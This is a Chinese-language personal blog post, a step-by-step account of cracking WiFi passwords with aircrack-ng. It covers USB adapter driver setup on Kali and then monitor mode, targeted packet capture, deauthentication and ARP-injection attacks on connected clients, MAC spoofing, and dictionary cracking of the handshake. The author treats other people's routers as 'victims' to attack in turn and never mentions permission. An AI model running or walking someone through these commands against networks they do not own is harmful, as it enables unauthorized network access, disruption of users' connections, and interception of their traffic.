1. 程式人生 > >aircrack-ng的使用以及個人苦逼的心路歷程

aircrack-ng的使用以及個人苦逼的心路歷程

為什麼要看關於aircrack-ng的東西呢? 因為可以破開WiFi啊 為什麼非要破開WiFi呢? 就是為了裝逼 沒錯!

不開玩笑了啊 進入正題

首先 苦逼的我先看了關於aircrack-ng的資料 不看的話根本就無從入手 瞭解到了一些基本的使用方法 接著就開始進行自己的試驗階段

這時候第一個問題出現了    放圖

既然是無線網路攻擊,那肯定就要用無線網絡卡啊

  however!

沒有無線網絡卡 也就是說虛擬機器裡面不識別電腦裡面自帶的網絡卡

好的 實驗到這裡就結束了  bye-bye

 

 

我可是學安全的男人啊 怎麼可能這樣就屈服了  既然無法識別內建的網絡卡 那就去買一個usb的無線網絡卡

可是無線網絡卡那麼多 哪一種可以用呢 我就走了彎路 去找了那種有天線的

事實證明 廣告完全就是瞎胡扯 首先 這個網絡卡的驅動不好配 雖然它預置了驅動安裝程式 可是安裝之後 沒有用 物理機識別不了 更不要提虛擬機器了 也可能是我沒有操作好 反正就是不好用 然後我就去小西門換了 對,在小西門買的 就是圖一個可以立即拿到

也沒有準備買很好的 但是老闆看我小 欺負我長得好看 問我要的貴了一點 看他開店房租那麼貴 也就沒有計較這些

好,迴歸正題

這個用的還行 插上虛擬機器以後可以識別出來 一定要在VM的虛擬機器那個選項裡給選上

如果沒有安裝無線網絡卡 那麼你的音效卡下面除了滑鼠 鍵盤 攝像頭以外什麼都沒有 安裝之後會有這個 出現usb和wlan

點選連線 我的有兩個 但是截圖的時候拔掉了網絡卡 所以有一個 插上之後記得兩個都要連線上

接著

可以看到有wlan0了

但是問題又來了 你的無線網絡卡沒有mac地址 沒有驅動  這是情況下會出現什麼問題呢

就是你攔截不到人家的arp請求包 arp request

我之前沒有配 所以抓了二十多萬份 裡面沒有一個請求包 當然了 這種情況可能要兩個原因

1 你的無線網絡卡沒有配置好 沒有裝驅動

2 被害的路由器 韌體不行 你death一下 它卡住了

這種情況下 我更願意去更改自己的配置  這個wifi不行 我還可以襲擊下一個啊 可是要是自己的配置不行 那就永遠不行

這時候 魯大師上場了 驅動檢測 看一下是什麼樣的  千萬不要給它下載驅動 看一下就可以了

我的是rel 8182eu 知道了就好辦了

進入 linux

首先 apt-get update 然後 apt-get upgrade 更新一下源 還有系統軟體

源的話 leafpad  /etc/apt/sources.list 開啟 選擇用國內的源

#阿里雲

deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib


#清華大學
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free


#浙江大學
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

 
  • #kali官方源

  • deb http://http.kali.org/kali kali-rolling main non-free contrib

  • #中科大的源

  • deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

  • deb http://mirrors.ustc.edu.cn/kali kali-rolling main contrib non-free

  • deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main contrib non-free

  • deb http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free

  • deb-src http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free

其實沒有必要用那麼多 用幾個就差不多了 我選了阿里雲 中科大 浙大 可以適度的增加

都完成以後 就更新一下

接著

apt-get install -y linux-headers-$(uname -r)

這個指令 把headers給下載下來 編譯環境需要用

現在思考一下驅動怎麼辦  需要下載 我在github上找到了

 

 所以就要把它給克隆下來啊 git clone https://github.com/mange/rtl8192eu-linux-driver  rtl8192

cd rtl8192
 sudo make && sudo make install

接著就需要等一會 很快就好了

然後就會發現自己的無線網絡卡也有了mac 而且襲擊的時候可以用macchanger來修改一下mac地址

好的 前期準備工作結束了 工欲善其事,必先利其器

接著就要開始了 

airmon-ng check kill 殺掉所有會妨礙到監聽的程序

airmon-ng start wlan0 開啟無線網絡卡

airodump-ng wlan0mon 開始監聽

附近的wifi都出現了

上面的各個標誌是什麼意思 可以自己查一下

接著選定一個wifi

airodump-ng --bssid 路由器的mac -c 所在頻道 --ivs -w 抓的包存放的地方

這個是開始專門的抓一個WiFi的包 --ivs可以過濾一些包 抓對自己有用的 這樣資料包更小 更方便爆破

不加的話就會抓所有的包 可以看到其他的東西  用來ivs的話 最後的包字尾是ivs 不用的話 cap 應該是這個吧

這時候就開始抓包了

為了得到有效的包 就要開始攻擊它 讓它傳送敏感包 比如一直襲擊已經連線上的客戶端 讓它掉線 只要它掉線了 就會發送登陸請求 這時候就可以抓回來分析了

aireplay-ng  -0 20 -a 路由器的mac -c 客戶端的mac wlan0mon

這時候就是death攻擊

還有一種arp攻擊

aireplay-ng  -3 -b 路由器的mac -h 客戶端的mac wlan0mon

arp requset注入攻擊 資料包超級多 更好分析

等到

右上角出現 handshake 就可以進行爆破了  按ctrl c 結束

都準備好了以後 開始破解

aircrack-ng -w 字典檔案 cap檔案

字典檔案的話 系統自己帶有wordlist cap就是剛才自己抓到的包

 

總結一下吧 很苦逼 遇到了很多問題 但是沒有畏懼 遇到了問題就去解決問題 不抱怨 既然選擇了遠方 便只顧風雨兼程